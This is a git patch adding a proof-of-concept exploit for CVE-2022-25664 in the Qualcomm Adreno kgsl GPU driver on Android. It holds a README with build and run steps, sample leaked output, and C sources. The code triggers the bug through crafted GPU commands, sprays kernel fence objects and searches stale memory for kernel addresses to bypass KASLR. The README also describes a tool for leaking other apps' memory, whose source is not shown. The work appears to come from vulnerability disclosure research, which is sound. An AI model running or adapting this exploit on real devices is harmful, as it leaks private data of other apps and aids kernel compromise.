From 3cd53e14a97bcd7854fb64f6bd03c1ce93bf216a Mon Sep 17 00:00:00 2001
From: Man Yue Mo <m-y-mo@github.com>
Date: Tue, 21 Feb 2023 11:29:33 +0000
Subject: [PATCH] Initial commit.

---
 .../Android/Qualcomm/CVE_2022_25664/README.md |  48 ++++
 .../CVE_2022_25664/adreno_kernel/adreno_cmd.c |  76 ++++++
 .../CVE_2022_25664/adreno_kernel/adreno_cmd.h |  40 +++
 .../adreno_kernel/adreno_kernel.c             | 225 +++++++++++++++++
 .../CVE_2022_25664/adreno_kernel/dma_search.h |  94 +++++++
 .../CVE_2022_25664/adreno_kernel/kgsl_utils.c |  80 ++++++
 .../CVE_2022_25664/adreno_kernel/kgsl_utils.h | 237 ++++++++++++++++++
 .../CVE_2022_25664/adreno_user/adreno.h       | 218 ++++++++++++++++
 .../CVE_2022_25664/adreno_user/adreno_user.c  | 221 ++++++++++++++++
 9 files changed, 1239 insertions(+)
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
 create mode 100644 SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c

diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
new file mode 100644
index 0000000..cfb7192
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md
@@ -0,0 +1,48 @@
+## CVE-2022-25664
+
+The write up can be found [here](https://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident). This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app.
+
+The directory `adreno_user` contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no telling or control over what information is being leaked. To test this, compile with the following command:
+
+```
+aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user
+```
+
+and then push `adreno_user` to the device and run it. It should print out non zero memory content:
+
+```
+flame:/ $ /data/local/tmp/adreno_user
+hexdump(0x50000000, 0x190)
+00000000  0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00  |........"U......|
+00000010  fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4  |..g.s.....g.s...|
+00000020  00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00  |................|
+00000030  b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
+00000040  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  |................|
+00000050  cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00  |..g.s...........|
+00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
+00000070  90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
+00000080  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
+00000090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
+000000a0  fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4  |..g.s.....g.s...|
+.......
+```
+
+The directory `adreno_kernel` contains a proof-of-concept for leaking kernel information for KASLR bypass. It'll repeatedly trigger the bug and tries to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the Macro `KERNEL_BRANCH` in `adreno_kernel.c` should be set to either `4` or `5`.
+
+To test, compile with 
+
+```
+aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o  adreno_kernel
+```
+
+and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions:
+
+```
+flame:/ $ /data/local/tmp/adreno_kernel
+found dma fence object:
+kgsl_syncsource_fence_ops address: ffffff9daaea8b48
+object address: fffffffe116100a0
+syncsource address: fffffffe0b244480
+```
+
+It has been tested on a number of devices. The time it takes (depends on the success rate of a single leak) varies across devices. It is relatively quick Pixel 4, but takes longer on the Samsung Z flip 3.
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
new file mode 100644
index 0000000..9a9b279
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c
@@ -0,0 +1,76 @@
+#include "adreno_cmd.h"
+
+uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
+{
+    uint *start = cmds;
+
+    *cmds++ = lower_32_bits(gpuaddr);
+    *cmds++ = upper_32_bits(gpuaddr);
+
+    return cmds - start;
+}
+
+uint pm4_calc_odd_parity_bit(uint val) {
+    return (0x9669 >> (0xf & ((val) ^
+                              ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
+                              ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
+                              ((val) >> 28)))) & 1;
+}
+
+uint cp_type7_packet(uint opcode, uint cnt) {
+    return CP_TYPE7_PKT | ((cnt) << 0) |
+           (pm4_calc_odd_parity_bit(cnt) << 15) |
+           (((opcode) & 0x7F) << 16) |
+           ((pm4_calc_odd_parity_bit(opcode) << 23));
+}
+
+uint cp_wait_for_me(
+        uint *cmds)
+{
+    uint *start = cmds;
+
+    *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0);
+
+    return cmds - start;
+}
+
+uint cp_mem_packet(int opcode, uint size, uint num_mem) {
+    return cp_type7_packet(opcode, size + num_mem);
+}
+
+uint cp_wait_for_idle(
+        uint *cmds)
+{
+    uint *start = cmds;
+
+    *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
+
+    return cmds - start;
+}
+
+uint cp_type4_packet(uint opcode, uint cnt)
+{
+    return CP_TYPE4_PKT | ((cnt) << 0) |
+           (pm4_calc_odd_parity_bit(cnt) << 7) |
+           (((opcode) & 0x3FFFF) << 8) |
+           ((pm4_calc_odd_parity_bit(opcode) << 27));
+}
+
+uint cp_register(
+        unsigned int reg, unsigned int size)
+{
+    return cp_type4_packet(reg, size);
+}
+
+uint cp_invalidate_state(
+        uint *cmds)
+{
+    uint *start = cmds;
+
+    *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+    *cmds++ = 0x40000;
+    *cmds++ = 0;
+    *cmds++ = 0;
+
+    return cmds - start;
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
new file mode 100644
index 0000000..01cfeb5
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h
@@ -0,0 +1,40 @@
+#ifndef ADRENO_CMD_H
+#define ADRENO_CMD_H
+
+#include <unistd.h>
+
+#define CP_TYPE4_PKT    (4 << 28)
+#define CP_TYPE7_PKT    (7 << 28)
+
+#define CP_NOP                  0x10
+#define CP_WAIT_FOR_ME          0x13
+#define CP_WAIT_FOR_IDLE        0x26
+#define CP_WAIT_REG_MEM         0x3c
+#define CP_MEM_WRITE            0x3d
+#define CP_INDIRECT_BUFFER_PFE  0x3f
+#define CP_SET_DRAW_STATE       0x43
+#define CP_MEM_TO_MEM           0x73
+#define CP_SET_PROTECTED_MODE   0x5f
+
+#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
+#define lower_32_bits(n) ((uint32_t)(n))
+
+uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr);
+
+uint pm4_calc_odd_parity_bit(uint val);
+
+uint cp_type7_packet(uint opcode, uint cnt);
+
+uint cp_wait_for_me(uint *cmds);
+
+uint cp_mem_packet(int opcode, uint size, uint num_mem);
+
+uint cp_wait_for_idle(uint *cmds);
+
+uint cp_type4_packet(uint opcode, uint cnt);
+
+uint cp_register(unsigned int reg, unsigned int size);
+
+uint cp_invalidate_state(uint *cmds);
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
new file mode 100644
index 0000000..474f706
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c
@@ -0,0 +1,225 @@
+#include <err.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <time.h>
+#include <poll.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <sched.h>
+#include <linux/aio_abi.h>
+
+
+#include "kgsl_utils.h"
+#include "adreno_cmd.h"
+#include "dma_search.h"
+
+#define CMD_SIZE 4
+
+#define OBJS_PER_SLAB (0x1000/OBJECT_SIZE)
+
+#define CPU_PARTIAL 30
+
+#define MMAP_SPRAY 1000
+
+#define OBJ_SPRAY 10000
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS  (8 * sizeof (unsigned long))
+typedef struct
+{
+   unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+  ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+  memset((cpusetp), 0, sizeof(cpu_set_t))
+
+#define KERNEL_BRANCH KERNEL_4
+
+void migrate_to_cpu(int i)
+{
+    int syscallres;
+    pid_t pid = gettid();
+    cpu_set_t cpu;
+    CPU_ZERO(&cpu);
+    CPU_SET(i, &cpu);
+
+    syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
+    if (syscallres)
+    {
+        err(1, "Error in the syscall setaffinity");
+    }
+}
+
+static uint32_t* map_anon(int kgsl_fd, uint64_t* addr, size_t size) {
+  uint32_t* out = NULL;
+  out = (uint32_t*)mmap(NULL, size, PROT_READ|PROT_WRITE,
+                                        MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  if (out == MAP_FAILED) {
+    err(1, "shared_mem_buf failed");
+  }
+  int ret = kgsl_map(kgsl_fd, (unsigned long)out, size, addr, 0);
+    
+  if (ret == -1) {
+    err(1, "kgsl_map failed %p\n", out);
+  }
+  return out;
+}
+
+static uint32_t write_gpu_cmd(uint32_t* write_cmd_buf, uint64_t shared_mem_gpuaddr, uint32_t n) {
+  uint32_t* write_cmds;
+
+  write_cmd_buf = write_cmd_buf + 0x1000/CMD_SIZE - 5;
+
+  write_cmds = write_cmd_buf;
+
+  *write_cmds++ = cp_type7_packet(CP_NOP, 1);
+  *write_cmds++ = 0xffffffff;
+
+  *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + n);
+
+  write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr);
+
+  return (write_cmds - write_cmd_buf + n) * CMD_SIZE;
+}
+
+
+static  int io_setup(unsigned nr, aio_context_t *ctxp)
+{
+  return syscall(__NR_io_setup, nr, ctxp);
+}
+
+static int io_destroy(aio_context_t ctx) 
+{
+  return syscall(__NR_io_destroy, ctx);
+}
+
+int find_address() {
+  uint32_t *write_cmd_buf;
+  uint64_t *shared_mem_buf;
+  void *shared_mem_buf2;
+  uint64_t shared_mem_gpuaddr2;
+  uint32_t n = 2048;
+  uint64_t shared_mem_size = 0x2000;
+  uint32_t cmd_size;
+  uint64_t write_cmd_gpuaddr = 0;
+  uint64_t shared_mem_gpuaddr = 0;
+  uint64_t hole_size = 0x1000;
+  int fds[OBJS_PER_SLAB * CPU_PARTIAL];
+  int spray_fds[OBJ_SPRAY];
+
+  int fd = open("/dev/kgsl-3d0", O_RDWR);
+
+  if (fd == -1) {
+    err(1, "cannot open kgsl");
+  }
+
+  uint32_t ctx_id;
+  if (kgsl_ctx_create(fd, &ctx_id)) {
+    err(1, "kgsl_ctx_create failed.");
+  }
+
+  struct kgsl_syncsource_create syncsource = {0};
+  if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE, &syncsource) < 0) {
+    err(1, "unable to create syncsource\n");
+  }
+
+  for (int i = 0; i < OBJ_SPRAY; i++) {
+    struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id};
+    if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) {
+      err(1, "Failed to create fence");
+    }
+    spray_fds[i] = create_fence.fence_fd;
+  }
+
+  for (int i = 0; i < CPU_PARTIAL * OBJS_PER_SLAB; i++) {
+    struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id};
+    if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) {
+      err(1, "Failed to create fence");
+    }
+    fds[i] = create_fence.fence_fd;
+  }
+
+  shared_mem_buf = (uint64_t*)map_anon(fd, &shared_mem_gpuaddr, shared_mem_size);
+  write_cmd_buf = map_anon(fd, &write_cmd_gpuaddr, 0x1000);
+  uint64_t write_cmd_gpuaddr_start = write_cmd_gpuaddr;
+
+  write_cmd_gpuaddr = write_cmd_gpuaddr + 0x1000 - 5 * CMD_SIZE;
+
+  uint32_t* write_cmd_buf_start = write_cmd_buf;
+  cmd_size = write_gpu_cmd(write_cmd_buf, shared_mem_gpuaddr, n);
+
+  usleep(50000);
+  void* hole = mmap(NULL, hole_size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  shared_mem_buf2 = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+  if (shared_mem_buf2 == MAP_FAILED) {
+    err(1, "shared_mem_buf2 failed");
+  }
+
+  munmap(hole, hole_size);
+  aio_context_t ctx = 0;
+  uint32_t nr_events = 32;
+  
+  migrate_to_cpu(0);
+  for (int i = 0; i < OBJS_PER_SLAB; i++) {
+    close(fds[i + (CPU_PARTIAL - 1) * OBJS_PER_SLAB]);
+  }
+
+  for (int i = 0; i < (CPU_PARTIAL - 1); i++) {
+    close(fds[i * OBJS_PER_SLAB]);
+  }
+
+  if (io_setup(nr_events, &ctx) < 0) err(1, "io_setup error\n");
+  if (kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1) == -1) {
+    err(1, "kgsl_map failed (shared_mem_buf2)");
+  }
+
+  if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmd_size, 1, 0, write_cmd_gpuaddr, cmd_size)) {
+    err(1, "gpu_command failed.");
+  }
+  usleep(150000);
+  if (shared_mem_gpuaddr2 != write_cmd_gpuaddr_start + 0x1000) {
+    err(1, "wrong address layout shared_mem_gpuaddr2 %lx write_cmd_gpuaddr %lx\n", shared_mem_gpuaddr2, write_cmd_gpuaddr);
+  }
+  if (ctx != (uint64_t)shared_mem_buf2 + 0x1000) {
+    err(1, "wrong address layout shared_mem_buf2 %p ctx %lx\n", shared_mem_buf2, ctx);
+  }
+
+  int ret = dma_search(shared_mem_buf + 0x1000/8, 0x1000/8, KERNEL_BRANCH);
+  if (ret == -1) {
+    io_destroy(ctx);
+    munmap(shared_mem_buf2, 0x1000);
+    munmap(shared_mem_buf, 0x2000);
+    munmap(write_cmd_buf, 0x1000);
+    for (int i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) close(fds[i]);
+    for (int i = 0; i < OBJ_SPRAY; i++) close(spray_fds[i]);
+    close(fd);
+  }
+  return ret;
+}
+
+int main() {
+
+  for (int i = 0; i < MMAP_SPRAY; i++) {
+    mmap(NULL, 0x1000,PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  }
+  int success = -1;
+  int counter = 0;
+  while (success == -1) {
+    success = find_address();
+    counter++;
+    if (counter % 20 == 0) printf("failed after %d\n", counter);
+  }
+
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
new file mode 100644
index 0000000..b103107
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
@@ -0,0 +1,94 @@
+#ifndef DMA_SEARCH_H
+#define DMA_SEARCH_H
+
+#include <unistd.h>
+#include <stdlib.h>
+
+#define OBJECT_SIZE 128
+
+#define STRIDE (OBJECT_SIZE/8)
+
+struct dma_info {
+  uint64_t ops;
+  uint64_t cb_list;
+  uint64_t spinlock;
+  uint64_t context;
+};
+
+enum dma_search_type {
+  KERNEL_4,
+  KERNEL_5
+};
+
+int try_match_object_54(uint64_t* obj, struct dma_info* out) {
+  //No ops
+  if (obj[1] == 0) return 0;
+  //cb_list not initialized
+  if (obj[2] != obj[3]) return 0;
+  //no cb_list
+  if (obj[2] == 0 || obj[3] == 0) return 0;
+  if (out->ops == 0) {
+    out->ops = obj[1];
+    out->cb_list = obj[2];
+    out->context = obj[4];
+    return 1;
+  }
+  if (out->ops != obj[1]) {
+    printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]);
+    return 0;
+  }
+  return 1;
+}
+
+int try_match_object_414(uint64_t* obj, struct dma_info* out) {
+  //No ops
+  if (obj[1] == 0) return 0;
+  //rcu not zero
+  if (obj[2] != 0 || obj[3] != 0) return 0;
+  //cb_list not initialized
+  if (obj[4] != obj[5]) return 0;
+  //no cb_list
+  if (obj[4] == 0 || obj[5] == 0) return 0;
+  //no spinlock
+  if (obj[6] == 0) return 0;
+  if (out->ops == 0) {
+    out->ops = obj[1];
+    out->cb_list = obj[4];
+    out->spinlock = obj[6];
+    out->context = obj[7];
+    return 1;
+  }
+  if (out->ops != obj[1]) {
+    printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]);
+    return 0;
+  }
+  if (out->spinlock != obj[6]) {
+    printf("out->spinlock %lx obj[6] %lx\n", out->spinlock, obj[6]);
+    return 0;
+  }
+  return 1;
+};
+
+int dma_search(uint64_t* region, size_t len, enum dma_search_type type) {
+  if (len % OBJECT_SIZE != 0) err(1, "len is not divisible by object size\n");
+  struct dma_info info = {0};
+  int match = 0;
+  for (int i = 0; i < len; i+= STRIDE) {
+      if (type == KERNEL_4) {
+        match += try_match_object_414(region + i, &info);
+      } else if (type == KERNEL_5){
+        match += try_match_object_54(region + i, &info);
+      } else {
+        err(1, "unknown kernel branch\n");
+      }
+  }
+  if (match > 3) {
+    printf("found dma fence object:\n");
+    printf("kgsl_syncsource_fence_ops address: %lx\n", info.ops);
+    printf("object address: %lx\n", info.cb_list);
+    return 1;
+  }
+  return -1;  
+};
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
new file mode 100644
index 0000000..1fc3c5a
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
@@ -0,0 +1,80 @@
+#include <string.h>
+
+#include "kgsl_utils.h"
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id)
+{
+	struct kgsl_drawctxt_create req = {
+			.flags = 0x00001812,
+	};
+	int ret;
+
+	ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req);
+	if (ret)
+		return ret;
+
+	*ctx_id = req.drawctxt_id;
+
+	return 0;
+}
+
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) {
+    struct kgsl_command_object *cmds;
+
+    struct kgsl_gpu_command req = {
+            .context_id = ctx_id,
+            .cmdsize = sizeof(struct kgsl_command_object),
+            .numcmds = n,
+    };
+    size_t cmds_size;
+    uint32_t i;
+
+    cmds_size = n * sizeof(struct kgsl_command_object);
+
+    cmds = (struct kgsl_command_object *) malloc(cmds_size);
+
+    if (cmds == NULL) {
+        return -1;
+    }
+
+    memset(cmds, 0, cmds_size);
+
+    for (i = 0; i < n; i++) {
+        cmds[i].flags = KGSL_CMDLIST_IB;
+
+        if (i == target_idx) {
+            cmds[i].gpuaddr = target_cmd;
+            cmds[i].size = target_size;
+        }
+        else {
+            /* the shift here is helpful for debugging failed alignment */
+            cmds[i].gpuaddr = gpuaddr + (i << 16);
+            cmds[i].size = cmdsize;
+        }
+    }
+    req.cmdlist = (unsigned long) cmds;
+    return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
+}
+
+int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly) {
+    struct kgsl_map_user_mem req = {
+            .len = len,
+            .offset = 0,
+            .hostptr = addr,
+            .memtype = KGSL_USER_MEM_TYPE_ADDR,
+//            .flags = KGSL_MEMFLAGS_USE_CPU_MAP,
+    };
+    if (readonly) {
+      req.flags |= KGSL_MEMFLAGS_GPUREADONLY;
+    }
+    int ret;
+
+    ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req);
+    if (ret)
+        return ret;
+
+    *gpuaddr = req.gpuaddr;
+
+    return 0;
+}
+
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
new file mode 100644
index 0000000..79033dc
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
@@ -0,0 +1,237 @@
+#ifndef KGSL_UTILS_H
+#define KGSL_UTILS_H
+
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+
+#define KGSL_OBJLIST_MEMOBJ  0x00000008U
+#define KGSL_OBJLIST_PROFILE 0x00000010U
+#define KGSL_DRAWOBJ_PROFILING      0x00000010
+#define KGSL_MEMFLAGS_IOCOHERENT  (1ULL << 31)
+
+enum kgsl_user_mem_type {
+	KGSL_USER_MEM_TYPE_PMEM		= 0x00000000,
+	KGSL_USER_MEM_TYPE_ASHMEM	= 0x00000001,
+	KGSL_USER_MEM_TYPE_ADDR		= 0x00000002,
+	KGSL_USER_MEM_TYPE_ION		= 0x00000003,
+	/*
+	 * ION type is retained for backwards compatibility but Ion buffers are
+	 * dma-bufs so try to use that naming if we can
+	 */
+	KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,
+	KGSL_USER_MEM_TYPE_MAX		= 0x00000007,
+};
+
+struct kgsl_timeline_fence_get {
+	__u64 seqno;
+	__u32 timeline;
+	int handle;
+};
+
+#define IOCTL_KGSL_TIMELINE_FENCE_GET \
+	_IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get)
+
+
+struct kgsl_timeline_create {
+	__u64 seqno;
+	__u32 id;
+/* private: padding for 64 bit compatibility */
+	__u32 padding;
+};
+
+#define IOCTL_KGSL_TIMELINE_CREATE \
+	_IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create)
+
+#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32)
+
+struct kgsl_device_getproperty {
+	unsigned int type;
+	void *value;
+	size_t sizebytes;
+};
+
+#define IOCTL_KGSL_DEVICE_GETPROPERTY \
+	_IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty)
+
+
+struct kgsl_gpumem_alloc_id {
+	unsigned int id;
+	unsigned int flags;
+	uint64_t size;
+	uint64_t mmapsize;
+	unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+	_IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_command_object {
+    uint64_t offset;
+    uint64_t gpuaddr;
+    uint64_t size;
+    unsigned int flags;
+    unsigned int id;
+};
+
+struct kgsl_gpu_command {
+	uint64_t flags;
+	uint64_t __user cmdlist;
+	unsigned int cmdsize;
+	unsigned int numcmds;
+	uint64_t __user objlist;
+	unsigned int objsize;
+	unsigned int numobjs;
+	uint64_t __user synclist;
+	unsigned int syncsize;
+	unsigned int numsyncs;
+	unsigned int context_id;
+	unsigned int timestamp;
+};
+
+struct kgsl_map_user_mem {
+    int fd;
+    unsigned long gpuaddr;   /*output param */
+    size_t len;
+    size_t offset;
+    unsigned long hostptr;   /*input param */
+    enum kgsl_user_mem_type memtype;
+    unsigned int flags;
+};
+
+struct kgsl_drawctxt_create {
+    unsigned int flags;
+    unsigned int drawctxt_id; /*output param */
+};
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+    unsigned int drawctxt_id;
+};
+
+
+#define KGSL_IOC_TYPE 0x09
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+        _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+        _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+        _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+#define IOCTL_KGSL_GPU_COMMAND \
+        _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
+
+#define KGSL_CMDLIST_IB             0x00000001U
+#define KGSL_MEMFLAGS_USE_CPU_MAP   0x10000000ULL
+
+struct kgsl_gpuobj_import {
+	uint64_t __user priv;
+	uint64_t priv_len;
+	uint64_t flags;
+	unsigned int type;
+	unsigned int id;
+};
+
+struct kgsl_gpuobj_import_dma_buf {
+	int fd;
+};
+
+struct kgsl_gpuobj_import_useraddr {
+	uint64_t virtaddr;
+};
+
+struct kgsl_gpuobj_free {
+	uint64_t flags;
+	uint64_t __user priv;
+	unsigned int id;
+	unsigned int type;
+	unsigned int len;
+};
+
+#define KGSL_GPUOBJ_FREE_ON_EVENT 1
+
+#define KGSL_GPU_EVENT_TIMESTAMP 1
+#define KGSL_GPU_EVENT_FENCE     2
+
+struct kgsl_gpu_event_timestamp {
+	unsigned int context_id;
+	unsigned int timestamp;
+};
+
+struct kgsl_gpu_event_fence {
+	int fd;
+};
+
+struct kgsl_gpumem_free_id {
+	unsigned int id;
+/* private: reserved for future use*/
+	unsigned int __pad;
+};
+
+#define IOCTL_KGSL_GPUMEM_FREE_ID _IOWR(KGSL_IOC_TYPE, 0x35, struct kgsl_gpumem_free_id)
+
+#define IOCTL_KGSL_GPUOBJ_FREE \
+	_IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free)
+
+struct dma_buf_sync {
+	__u64 flags;
+};
+
+#define DMA_BUF_SYNC_READ      (1 << 0)
+#define DMA_BUF_SYNC_WRITE     (2 << 0)
+#define DMA_BUF_SYNC_RW        (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE)
+#define DMA_BUF_SYNC_START     (0 << 2)
+#define DMA_BUF_SYNC_END       (1 << 2)
+#define DMA_BUF_SYNC_USER_MAPPED       (1 << 3)
+
+#define DMA_BUF_SYNC_VALID_FLAGS_MASK \
+	(DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END)
+
+#define DMA_BUF_BASE		'b'
+#define DMA_BUF_IOCTL_SYNC	_IOW(DMA_BUF_BASE, 0, struct dma_buf_sync)
+
+#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL
+
+
+struct kgsl_syncsource_create {
+	unsigned int id;
+/* private: reserved for future use */
+	unsigned int __pad[3];
+};
+
+#define IOCTL_KGSL_SYNCSOURCE_CREATE \
+	_IOWR(KGSL_IOC_TYPE, 0x40, struct kgsl_syncsource_create)
+
+struct kgsl_syncsource_create_fence {
+	unsigned int id;
+	int fence_fd;
+/* private: reserved for future use */
+	unsigned int __pad[4];
+};
+
+/**
+ * struct kgsl_syncsource_signal_fence - Argument to
+ *     IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE
+ * @id: syncsource id
+ * @fence_fd: sync_fence fd to signal
+ *
+ * Signal a fence that was created by a IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE
+ * call using the same syncsource id. This allows a fence to be shared
+ * to other processes but only signaled by the process owning the fd
+ * used to create the fence.
+ */
+#define IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE \
+	_IOWR(KGSL_IOC_TYPE, 0x42, struct kgsl_syncsource_create_fence)
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id);
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size);
+int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly);
+
+#endif
